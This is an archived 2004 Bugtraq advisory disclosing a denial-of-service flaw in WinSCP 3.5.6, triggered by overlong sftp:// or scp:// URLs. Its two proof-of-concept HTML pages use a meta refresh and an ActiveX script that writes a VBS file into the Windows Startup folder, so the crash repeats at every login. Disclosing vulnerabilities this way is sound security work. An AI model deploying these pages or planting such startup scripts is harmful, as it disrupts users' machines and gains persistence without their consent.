lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 15 Apr 2004 06:17:04 -0000 From: Luca Ercoli <luca.e@...web.com> To: bugtraq@...urityfocus.com Subject: WinSCP Denial of Service Package: WinSCP Auth: http://winscp.sourceforge.net Version(s): 3.5.6 (maybe also prior versions are vulnerable) Vulnerability: Denial of Service What’s WinSCP: “WinSCP is an open source SFTP (SSH File Transfer Protocol) and SCP (Secure CoPy) client for Windows using SSH (Secure SHell). Its main function is safe copying of files between a local and a remote computer.” Vulnerability Description: A default installation of WinSCP provide the user with functionality to handle sftp:// and scp:// addresses. The vulnerability exists due to the way the application handles long URL’s. A malformed scp:// or sftp:// address embedded in a HTML tag cause the WinSCP application to exhaust CPU and Memory resources. The attacker would need the ability to convince the user to visiting a web site he controlled or opening an HTML e-mail he had prepared. During the denial of service, WinSCP will not display any GUI. Goal: An attacker may use this flaw to prevent the users of attacked host from working properly. Pratical Examples: ------ WinSCP_DoS1.html -------- <HTML> <HEAD> <TITLE>WinSCP DoS</TITLE> <meta http-equiv="Refresh" content="0; URL=sftp://AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"> </HEAD> <BODY> </BODY> </HTML> ---------------------------------- -------- WinSCP_DoS2.html ------- <html> <head> <title>WinSCP DoS</title> <script language="JScript"> var WshShell = new ActiveXObject("WScript.Shell"); strSU = WshShell.SpecialFolders("StartUp"); var fso = new ActiveXObject("Scripting.FileSystemObject"); var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true); vibas.WriteLine("Dim shell"); vibas.WriteLine("Dim quote"); vibas.WriteLine("Dim DoS"); vibas.WriteLine("Dim param"); vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\""); vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\""); vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")"); vibas.WriteLine("quote = Chr(34)"); vibas.WriteLine("pgm = \"explorer\""); vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param"); vibas.Close(); </script> </head> </html> ---------------------------------- Credits: -- Luca Ercoli <luca.e [at] seeweb.com> Seeweb http://www.seeweb.com
Powered by blists - more mailing lists